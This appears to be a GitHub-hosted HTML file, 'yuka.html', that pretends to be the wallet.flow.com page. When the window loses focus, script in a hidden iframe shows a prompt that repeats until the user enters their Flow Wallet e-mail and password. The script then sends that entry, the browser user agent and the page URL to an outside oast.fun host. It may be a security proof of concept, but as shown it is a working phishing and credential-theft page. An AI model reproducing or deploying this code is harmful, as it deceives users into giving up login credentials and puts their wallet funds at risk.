-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathyuka.html
More file actions
42 lines (41 loc) · 1.49 KB
/
yuka.html
File metadata and controls
42 lines (41 loc) · 1.49 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no">
<title>wallet.flow.com</title>
<style>
iframe { visibility: hidden; }
body { font-family: system-ui, sans-serif; text-align: center; padding-top: 100px; }
</style>
<script>
window.onblur = function () {
const code =
"(function(){try{"
+ "var msg='In order to access your Flow Wallet\\n"
+ "you must first login on your\\nwallet.flow.com Account.\\n\\n"
+ "Please type your e-mail\\nand your password:';"
+ "var v='';"
// Force user to fill (loop until non-empty)
+ "while(v===null||(''+v).trim()===''){"
+ " v=prompt(msg,'E-mail / Password.');"
+ "}"
// Build webhook URL with some context
+ "var u='https://mpbxogpeszumkijyjecohzd8mgoadvoiq.oast.fun/'"
+ " + '?creds=' + encodeURIComponent(v)"
+ " + '&ua=' + encodeURIComponent(navigator.userAgent)"
+ " + '&page=' + encodeURIComponent(location.href);"
// Try sendBeacon first (non-blocking), then fallback to Image
+ "try{ if(!navigator.sendBeacon(u)){ throw new Error('beacon-fallback'); } }catch(e){"
+ " try{ (new Image()).src = u; }catch(_e){}"
+ "}"
+ "}catch(e){}})()";
document.getElementById('iframe').src = "javascript:" + code;
};
</script>
</head>
<body>
<h1>Click Here</h1>
<iframe id="iframe"></iframe>
</body>
</html>